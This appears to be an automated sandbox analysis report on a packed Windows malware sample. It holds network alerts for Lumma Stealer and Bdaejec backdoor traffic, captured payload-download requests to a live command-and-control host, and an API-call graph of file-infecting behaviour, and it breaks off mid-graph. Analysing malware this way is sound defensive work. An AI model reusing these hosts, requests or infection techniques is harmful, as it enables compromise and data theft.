                          mov dword ptr [ebp-30h], esi
                          mov dword ptr [ebp-1Ch], edx
                          mov dword ptr [ebp-34h], ecx
                          cmp edx, dword ptr [ebp-34h]
                          jnc 00007FCF287585EEh
                          movzx ecx, word ptr [esi+edx*2]
                          mov edx, dword ptr [ebx+edx*4]
                          mov esi, dword ptr [edi+ecx*4]
                          add edx, eax
                          mov ecx, dword ptr [edx]
                          add esi, eax
                          cmp ecx, 4D746547h
                          jne 00007FCF287584F4h
                          cmp dword ptr [edx+04h], 6C75646Fh
                          jne 00007FCF287584EBh
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x33d0460x6c.imports
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x33e0000x658fc.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x578f30x27a7658c458b94800d91affd5355c227516aeFalse0.9938739825885656data7.961868081494972IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          0x590000x15000xb0bf597f377bdfaa40603d70ce1f9d28b1bFalse1.0038910505836576data7.8939207362765895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          0x5b0000x10ef80xdae8a2149b0a7fd3d86b40ae68694f2b16cdFalse0.998429693076374data7.948313514751607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x6c0000xe8040x77d5411fc2a5d4cddb2c820e3471ce3916a3False0.9976855624735144data7.956946873009958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          0x7b0000x2c1f880x8165eb8e7b824e84434f71385a110baace88dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .imports0x33d0000x10000x200c53b7eff20be0e39153ee42ff8b0a5a2False0.185546875data1.3699486905026688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x33e0000x65a000x65a00539cdad808cada6701185ef4a2eeefbeFalse0.09494397678351783data2.8350695622035795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .themida0x3a40000x79e0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .boot0xb420000x4d3c000x4d3ab231eb32323bbbc7c85eca4b546b5f0c7cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          ;Mu0x10160000x50000x4200c6f057a472e46ee30a3269f5cc90af88False0.7775804924242424data6.935039632025298IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x33e2680xa068Device independent bitmap graphic, 256 x 512 x 4, image size 32768Raeto-RomanceSwitzerland0.1818868108318722
                          RT_ICON0x3482e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152Raeto-RomanceSwitzerland0.3469512195121951
                          RT_ICON0x3489580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512Raeto-RomanceSwitzerland0.4529569892473118
                          RT_ICON0x348c500x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288Raeto-RomanceSwitzerland0.5081967213114754
                          RT_ICON0x348e480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128Raeto-RomanceSwitzerland0.5709459459459459
                          RT_ICON0x348f800x12428Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colorsRaeto-RomanceSwitzerland0.07974114878596641
                          RT_ICON0x35b3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRaeto-RomanceSwitzerland0.25826226012793174
                          RT_ICON0x35c2700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRaeto-RomanceSwitzerland0.29106498194945846
                          RT_ICON0x35cb280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRaeto-RomanceSwitzerland0.23049132947976878
                          RT_ICON0x35d0a00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336Raeto-RomanceSwitzerland0.06457303902713259
                          RT_ICON0x39f0d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Raeto-RomanceSwitzerland0.18724066390041494
                          RT_ICON0x3a16900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Raeto-RomanceSwitzerland0.24648217636022515
                          RT_ICON0x3a27480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Raeto-RomanceSwitzerland0.32049180327868854
                          RT_ICON0x3a30e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Raeto-RomanceSwitzerland0.41400709219858156
                          RT_GROUP_ICON0x3a35580xcadataRaeto-RomanceSwitzerland0.5792079207920792
                          RT_VERSION0x3a36340x2c8dataRaeto-RomanceSwitzerland0.4943820224719101
                          DLLImport
                          kernel32.dllGetModuleHandleA
                          USER32.dllGetDC
                          GDI32.dllBitBlt
                          Language of compilation systemCountry where language is spokenMap
                          Raeto-RomanceSwitzerland
                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-25T04:58:43.778567+0200UDP2050856ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (snuggleapplicationswo .fun)6388353192.168.2.71.1.1.1
                          2024-07-25T04:58:43.766900+0200UDP2050858ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (theoryapparatusjuko .fun)5929453192.168.2.71.1.1.1
                          2024-07-25T04:58:57.433919+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970852.165.165.26192.168.2.7
                          2024-07-25T04:58:39.801665+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5440153192.168.2.71.1.1.1
                          2024-07-25T04:58:43.832441+0200UDP2050857ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (strainriskpropos .store)5058453192.168.2.71.1.1.1
                          2024-07-25T04:58:44.570213+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49700799192.168.2.744.221.84.105
                          2024-07-25T04:59:36.509557+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436295852.165.165.26192.168.2.7
                          2024-07-25T04:58:43.634105+0200UDP2050898ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (healthproline .pro)6331753192.168.2.71.1.1.1
                          2024-07-25T04:58:43.800724+0200UDP2050860ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (punchtelephoneverdi .store)6445653192.168.2.71.1.1.1
                          2024-07-25T04:59:03.851303+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update62955443192.168.2.720.42.65.92
                          2024-07-25T04:58:47.684516+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49701799192.168.2.744.221.84.105
                          2024-07-25T04:58:40.340897+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49699799192.168.2.744.221.84.105
                          2024-07-25T04:58:43.789767+0200UDP2050861ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (smallrabbitcrossing .site)6125753192.168.2.71.1.1.1
                          2024-07-25T04:58:43.811138+0200UDP2050859ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (telephoneverdictyow .site)5726253192.168.2.71.1.1.1
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 25, 2024 04:58:39.913115025 CEST49699799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:39.918036938 CEST7994969944.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:39.918114901 CEST49699799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:39.919585943 CEST49699799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:39.924417019 CEST7994969944.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:40.340756893 CEST7994969944.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:40.340780973 CEST7994969944.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:40.340897083 CEST49699799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:40.510895014 CEST49699799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:40.515867949 CEST7994969944.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:44.138431072 CEST49700799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:44.143348932 CEST7994970044.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:44.143424034 CEST49700799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:44.143667936 CEST49700799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:44.154819965 CEST7994970044.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:44.570142031 CEST7994970044.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:44.570162058 CEST7994970044.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:44.570213079 CEST49700799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:44.570255995 CEST49700799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:44.594873905 CEST49700799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:44.600478888 CEST7994970044.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:47.276040077 CEST49701799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:47.281152010 CEST7994970144.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:47.281296015 CEST49701799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:47.282228947 CEST49701799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:47.287045956 CEST7994970144.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:47.684348106 CEST7994970144.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:47.684366941 CEST7994970144.221.84.105192.168.2.7
                          Jul 25, 2024 04:58:47.684515953 CEST49701799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:47.686522961 CEST49701799192.168.2.744.221.84.105
                          Jul 25, 2024 04:58:47.691272020 CEST7994970144.221.84.105192.168.2.7
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 25, 2024 04:58:39.801665068 CEST5440153192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:39.897883892 CEST53544011.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.634104967 CEST6331753192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.758450985 CEST53633171.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.766900063 CEST5929453192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.775505066 CEST53592941.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.778567076 CEST6388353192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.787033081 CEST53638831.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.789767027 CEST6125753192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.798151016 CEST53612571.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.800724030 CEST6445653192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.809612036 CEST53644561.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.811137915 CEST5726253192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.829638958 CEST53572621.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:43.832441092 CEST5058453192.168.2.71.1.1.1
                          Jul 25, 2024 04:58:43.850536108 CEST53505841.1.1.1192.168.2.7
                          Jul 25, 2024 04:58:58.801143885 CEST53522401.1.1.1192.168.2.7
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 25, 2024 04:58:39.801665068 CEST192.168.2.71.1.1.10xe359Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.634104967 CEST192.168.2.71.1.1.10xca10Standard query (0)healthproline.proA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.766900063 CEST192.168.2.71.1.1.10xf4c7Standard query (0)theoryapparatusjuko.funA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.778567076 CEST192.168.2.71.1.1.10x6d06Standard query (0)snuggleapplicationswo.funA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.789767027 CEST192.168.2.71.1.1.10xf21cStandard query (0)smallrabbitcrossing.siteA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.800724030 CEST192.168.2.71.1.1.10xe467Standard query (0)punchtelephoneverdi.storeA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.811137915 CEST192.168.2.71.1.1.10xb889Standard query (0)telephoneverdictyow.siteA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.832441092 CEST192.168.2.71.1.1.10x30eStandard query (0)strainriskpropos.storeA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 25, 2024 04:58:39.897883892 CEST1.1.1.1192.168.2.70xe359No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.758450985 CEST1.1.1.1192.168.2.70xca10Name error (3)healthproline.prononenoneA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.775505066 CEST1.1.1.1192.168.2.70xf4c7Name error (3)theoryapparatusjuko.funnonenoneA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.787033081 CEST1.1.1.1192.168.2.70x6d06Name error (3)snuggleapplicationswo.funnonenoneA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.798151016 CEST1.1.1.1192.168.2.70xf21cName error (3)smallrabbitcrossing.sitenonenoneA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.809612036 CEST1.1.1.1192.168.2.70xe467Name error (3)punchtelephoneverdi.storenonenoneA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.829638958 CEST1.1.1.1192.168.2.70xb889Name error (3)telephoneverdictyow.sitenonenoneA (IP address)IN (0x0001)false
                          Jul 25, 2024 04:58:43.850536108 CEST1.1.1.1192.168.2.70x30eName error (3)strainriskpropos.storenonenoneA (IP address)IN (0x0001)false
                          • ddos.dnsnb8.net:799
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.74969944.221.84.1057997520C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 04:58:39.919585943 CEST288OUTGET /cj//k1.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.74970044.221.84.1057997520C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 04:58:44.143667936 CEST288OUTGET /cj//k2.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.74970144.221.84.1057997520C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          TimestampBytes transferredDirectionData
                          Jul 25, 2024 04:58:47.282228947 CEST288OUTGET /cj//k3.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:22:58:37
                          Start date:24/07/2024
                          Path:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe"
                          Imagebase:0xde0000
                          File size:6'279'680 bytes
                          MD5 hash:641443F984C1754A4D606B248B334577
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:22:58:37
                          Start date:24/07/2024
                          Path:C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
                          Imagebase:0xdf0000
                          File size:15'872 bytes
                          MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 92%, ReversingLabs
                          Reputation:moderate
                          Has exited:true

                          Target ID:7
                          Start time:22:58:46
                          Start date:24/07/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528
                          Imagebase:0xaa0000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:32.2%
                            Dynamic/Decrypted Code Coverage:6.7%
                            Signature Coverage:24.6%
                            Total number of Nodes:285
                            Total number of Limit Nodes:10
                            execution_graph 888 df6076 889 df607b 888->889 893 df60c7 888->893 891 df60b0 VirtualAlloc 889->891 889->893 900 df61b2 889->900 890 df615f VirtualFree 890->893 891->893 892 df6198 VirtualFree 892->900 893->890 893->892 894 df60d5 VirtualAlloc 893->894 894->893 895 df6389 VirtualProtect 898 df63b7 895->898 896 df63fc VirtualProtect 897 df6400 896->897 898->896 899 df63e7 VirtualProtect 898->899 899->896 899->898 900->895 901 df62fb 900->901 1205 df6014 1206 df6035 GetModuleHandleA 1205->1206 1207 df605f 1205->1207 1208 df604d GetProcAddress 1206->1208 1209 df6058 1208->1209 1209->1207 1209->1208 1209->1209 902 df14e1 903 df14fd GetModuleHandleA 902->903 904 df1541 902->904 905 df151a VirtualQuery 903->905 908 df1512 903->908 906 df1573 904->906 909 df1549 904->909 905->908 913 df1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 906->913 908->904 910 df1566 909->910 930 df1af9 909->930 911 df1579 ExitProcess 914 df167f 913->914 915 df167a 913->915 936 df1718 GetSystemTimeAsFileTime 914->936 948 df139f GetVersionExA 915->948 918 df1686 919 df16ca 918->919 925 df16a0 CreateThread 918->925 920 df16d7 919->920 921 df16d0 919->921 923 df170f 920->923 924 df16dd lstrcpy 920->924 969 df1581 921->969 923->911 924->911 941 df2c48 memset 925->941 1185 df1099 925->1185 929 df1718 3 API calls 929->919 931 df1b09 930->931 932 df1b11 930->932 933 df1638 188 API calls 931->933 934 df1b16 CreateThread 932->934 935 df1b0f 932->935 933->935 934->935 1204 df1638 189 API calls 934->1204 935->910 937 df1735 SHSetValueA 936->937 938 df1754 936->938 940 df1786 __aulldiv 937->940 939 df175a SHGetValueA 938->939 938->940 939->940 940->918 975 df1973 PathFileExistsA 941->975 944 df2cb2 946 df2cbb VirtualFree 944->946 947 df16ba WaitForSingleObject 944->947 945 df2c8f CreateThread WaitForMultipleObjects 945->944 997 df2b8c memset GetLogicalDriveStringsA 945->997 946->947 947->929 949 df13cf LookupPrivilegeValueA 948->949 950 df14da 948->950 951 df13e7 949->951 953 df13ef 949->953 950->914 1165 df119f GetCurrentProcess OpenProcessToken 951->1165 953->950 1170 df120e GetModuleHandleA GetProcAddress 953->1170 958 df1448 GetCurrentProcessId 958->950 959 df1457 958->959 959->950 960 df1319 3 API calls 959->960 961 df147f 960->961 962 df1319 3 API calls 961->962 963 df148e 962->963 963->950 964 df1319 3 API calls 963->964 965 df14b4 964->965 966 df1319 3 API calls 965->966 967 df14c3 966->967 968 df1319 3 API calls 967->968 968->950 1184 df185b GetSystemTimeAsFileTime srand rand srand rand 969->1184 971 df1592 wsprintfA wsprintfA lstrlen CreateFileA 972 df15fb WriteFile CloseHandle 971->972 973 df1633 971->973 972->973 974 df161d ShellExecuteA 972->974 973->923 974->973 976 df19a0 975->976 993 df1ac7 975->993 977 df19af CreateFileA 976->977 978 df1a28 GetFileSize 977->978 979 df19c4 Sleep 977->979 981 df1a38 978->981 982 df1a80 978->982 979->977 980 df19d5 979->980 996 df185b GetSystemTimeAsFileTime srand rand srand rand 980->996 981->982 983 df1a3d VirtualAlloc 981->983 984 df1a8d FindCloseChangeNotification 982->984 985 df1a96 982->985 983->982 987 df1a53 983->987 984->985 988 df1aad 985->988 989 df1a9c DeleteFileA 985->989 987->982 991 df1a59 ReadFile 987->991 988->993 995 df1ab8 VirtualFree 988->995 989->988 990 df19da wsprintfA CopyFileA 990->978 994 df1a0d CreateFileA 990->994 991->982 991->987 993->944 993->945 994->978 994->989 995->993 996->990 998 df2c09 WaitForMultipleObjects 997->998 999 df2bc8 997->999 1000 df2c3c 998->1000 1001 df2c2a CreateThread 998->1001 1002 df2bfa lstrlen 999->1002 1003 df2bd2 GetDriveTypeA 999->1003 1004 df2be3 CreateThread 999->1004 1001->1000 1008 df2845 1001->1008 1002->998 1002->999 1003->999 1003->1002 1004->1002 1005 df2b7d 1004->1005 1018 df29e2 memset wsprintfA 1005->1018 1155 df274a memset memset SHGetSpecialFolderPathA wsprintfA 1008->1155 1010 df2878 DeleteFileA 1012 df288c VirtualFree 1010->1012 1013 df289a 1010->1013 1011 df2853 1011->1010 1016 df2692 8 API calls 1011->1016 1017 df239d 186 API calls 1011->1017 1012->1013 1014 df28ab 1013->1014 1015 df28a4 CloseHandle 1013->1015 1015->1014 1016->1011 1017->1011 1019 df2abc memset memset FindFirstFileA 1018->1019 1020 df2a3a memset lstrlen lstrcpyn strrchr 1018->1020 1032 df28b8 memset wsprintfA 1019->1032 1020->1019 1021 df2a88 1020->1021 1021->1019 1023 df2a9a lstrcmpiA 1021->1023 1025 df2aad lstrlen 1023->1025 1026 df2b74 1023->1026 1025->1019 1025->1023 1027 df2b61 FindNextFileA 1028 df2b6d FindClose 1027->1028 1029 df2b23 1027->1029 1028->1026 1030 df2b35 lstrcmpiA 1029->1030 1031 df28b8 174 API calls 1029->1031 1030->1028 1030->1029 1031->1027 1033 df2905 1032->1033 1040 df2951 memset 1032->1040 1034 df291b memset wsprintfA 1033->1034 1035 df2956 strrchr 1033->1035 1033->1040 1036 df29e2 180 API calls 1034->1036 1037 df2967 lstrcmpiA 1035->1037 1035->1040 1036->1040 1038 df297a 1037->1038 1039 df2988 lstrcmpiA 1037->1039 1050 df1e6e 1038->1050 1039->1040 1042 df2994 1039->1042 1040->1027 1043 df29ad strstr 1042->1043 1044 df29a5 lstrcpy 1042->1044 1045 df29cb 1043->1045 1046 df29d3 1043->1046 1044->1043 1093 df239d strstr 1045->1093 1115 df2692 1046->1115 1051 df1e7d 1050->1051 1124 df1df6 strrchr 1051->1124 1054 df2332 1057 df233d UnmapViewOfFile 1054->1057 1058 df2346 1054->1058 1055 df1eb0 SetFileAttributesA CreateFileA 1055->1054 1056 df1edf 1055->1056 1129 df1915 1056->1129 1057->1058 1061 df234b FindCloseChangeNotification 1058->1061 1062 df2350 1058->1062 1061->1062 1063 df2356 FindCloseChangeNotification 1062->1063 1064 df2391 1062->1064 1063->1064 1064->1040 1065 df1f2e 1065->1054 1135 df1c81 1065->1135 1069 df1f92 1070 df1c81 2 API calls 1069->1070 1071 df1f9f 1070->1071 1071->1054 1072 df1af9 169 API calls 1071->1072 1074 df2024 1071->1074 1076 df1fc0 1072->1076 1073 df1af9 169 API calls 1075 df207a 1073->1075 1074->1054 1074->1073 1077 df1af9 169 API calls 1075->1077 1076->1054 1076->1074 1078 df1af9 169 API calls 1076->1078 1081 df2090 1077->1081 1079 df1ffe 1078->1079 1080 df2013 FlushViewOfFile 1079->1080 1080->1074 1082 df20bb memset memset 1081->1082 1083 df20f5 1082->1083 1084 df1c81 2 API calls 1083->1084 1086 df21de 1084->1086 1085 df2226 memcpy UnmapViewOfFile CloseHandle 1140 df1b8a 1085->1140 1086->1085 1088 df226e 1148 df185b GetSystemTimeAsFileTime srand rand srand rand 1088->1148 1090 df22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1091 df1915 3 API calls 1090->1091 1092 df231f CloseHandle 1091->1092 1092->1054 1094 df2451 CreateFileA GetFileSize 1093->1094 1099 df23d8 1093->1099 1095 df2675 CloseHandle 1094->1095 1097 df2480 1094->1097 1096 df267c RemoveDirectoryA 1095->1096 1098 df2687 1096->1098 1097->1095 1100 df2499 1097->1100 1098->1040 1099->1094 1099->1098 1101 df1915 3 API calls 1100->1101 1102 df24a4 9 API calls 1101->1102 1150 df189d memset CreateProcessA 1102->1150 1105 df255c Sleep memset wsprintfA 1106 df29e2 163 API calls 1105->1106 1107 df2597 memset wsprintfA Sleep 1106->1107 1108 df189d 6 API calls 1107->1108 1109 df25e4 Sleep CreateFileA 1108->1109 1110 df1915 3 API calls 1109->1110 1111 df2610 CloseHandle 1110->1111 1111->1096 1112 df261e 1111->1112 1112->1096 1113 df2641 SetFilePointer WriteFile 1112->1113 1113->1096 1114 df2667 SetEndOfFile 1113->1114 1114->1096 1116 df26b2 WaitForSingleObject 1115->1116 1117 df26a2 CreateEventA 1115->1117 1118 df26c1 lstrlen ??2@YAPAXI 1116->1118 1121 df2708 1116->1121 1117->1116 1119 df26da lstrcpy 1118->1119 1120 df2736 SetEvent 1118->1120 1122 df26f1 1119->1122 1120->1040 1121->1120 1123 df2718 lstrcpy ??3@YAXPAX 1121->1123 1122->1120 1123->1122 1125 df1e13 lstrcpy strrchr 1124->1125 1126 df1e62 1124->1126 1125->1126 1127 df1e40 lstrcmpiA 1125->1127 1126->1054 1126->1055 1127->1126 1128 df1e52 lstrlen 1127->1128 1128->1126 1128->1127 1130 df1928 1129->1130 1134 df1924 SetFilePointer CreateFileMappingA MapViewOfFile 1129->1134 1131 df194f 1130->1131 1132 df192e memset GetFileTime 1130->1132 1133 df1954 SetFileTime 1131->1133 1131->1134 1132->1134 1133->1134 1134->1054 1134->1065 1137 df1c9c 1135->1137 1138 df1c94 1135->1138 1136 df1cae memset memset 1136->1138 1137->1136 1137->1138 1138->1054 1139 df185b GetSystemTimeAsFileTime srand rand srand rand 1138->1139 1139->1069 1141 df1b93 1140->1141 1149 df185b GetSystemTimeAsFileTime srand rand srand rand 1141->1149 1143 df1bca srand 1144 df1bd8 rand 1143->1144 1145 df1c08 1144->1145 1145->1144 1146 df1c29 memset memcpy lstrcat 1145->1146 1146->1088 1148->1090 1149->1143 1151 df190c 1150->1151 1152 df18e0 CloseHandle WaitForSingleObject 1150->1152 1151->1096 1151->1105 1153 df18fb GetExitCodeProcess 1152->1153 1154 df1907 CloseHandle 1152->1154 1153->1154 1154->1151 1164 df185b GetSystemTimeAsFileTime srand rand srand rand 1155->1164 1157 df27b5 wsprintfA CopyFileA 1158 df27de wsprintfA 1157->1158 1159 df2840 1157->1159 1160 df1973 17 API calls 1158->1160 1159->1011 1161 df280f 1160->1161 1162 df2813 DeleteFileA 1161->1162 1163 df2820 CreateFileA 1161->1163 1162->1163 1163->1159 1164->1157 1166 df11c6 AdjustTokenPrivileges 1165->1166 1167 df1200 CloseHandle 1165->1167 1168 df11f7 CloseHandle 1166->1168 1169 df11f6 1166->1169 1167->953 1168->1167 1169->1168 1171 df123f GetCurrentProcessId OpenProcess 1170->1171 1172 df1310 1170->1172 1171->1172 1176 df1262 